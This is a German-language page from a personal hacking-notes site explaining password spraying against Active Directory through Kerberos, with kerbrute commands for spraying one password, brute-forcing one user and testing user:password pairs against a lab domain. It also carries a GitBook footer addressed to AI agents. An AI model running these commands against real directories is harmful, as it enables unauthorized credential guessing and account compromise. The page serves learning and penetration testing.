> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/active-directory/kerberos/password-spraying-with-kerberos.md).

# Passwort-Spraying mit Kerberos

### Prinzip

**Passwort-Spraying** besteht darin, dasselbe Passwort bei mehreren Benutzern zu testen.

Im Gegensatz zu einem klassischen Brute-Force vermeiden wir es, viele Passwörter auf einem einzelnen Konto zu testen, was das Risiko einer Kontosperrung verringert.

### Passwort-Spray mit Kerbrute

Beispiel mit einem bestimmten Passwort:

{% code overflow="wrap" %}

```bash
kerbrute passwordspray -d whoami.local --dc dc01.whoami.local usernames.txt 'Password123'
```

{% endcode %}

Dieser Befehl testet das Passwort `Password123` bei allen Benutzern, die in `usernames.txt`.

<figure><img src="/files/4a713c3c4b214cceebe19abd5efc9766ac6c25e4" alt=""><figcaption></figcaption></figure>

### Brute-Force auf einen bestimmten Benutzer

Wenn wir mehrere Passwörter bei einem bestimmten Benutzer testen möchten:

{% code overflow="wrap" %}

```bash
kerbrute bruteuser -d whoami.local --dc dc01.whoami.local passwords.txt Administrador
```

{% endcode %}

Hier, `passwords.txt` enthält eine Passwortliste.

<figure><img src="/files/6ded4a2cf93f1b8ebfa381ea617ce06885c2bb4c" alt=""><figcaption></figcaption></figure>

### Brute-Force mit Benutzer-/Passwort-Paaren

Wir können auch eine Datei mit Paaren im Format verwenden:

```
username:password
```

Beispiel:

```
Administrator:password12345
Jordan:hello1453
user1:Password123
```

Reihenfolge :

{% code overflow="wrap" %}

```bash
kerbrute bruteforce -d whoami.local --dc dc01.whoami.local user_pw_file.txt
```

{% endcode %}

<figure><img src="/files/c7de70c8e24f73d0ee377f0f19eab08cd45b7dd3" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/active-directory/kerberos/password-spraying-with-kerberos.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
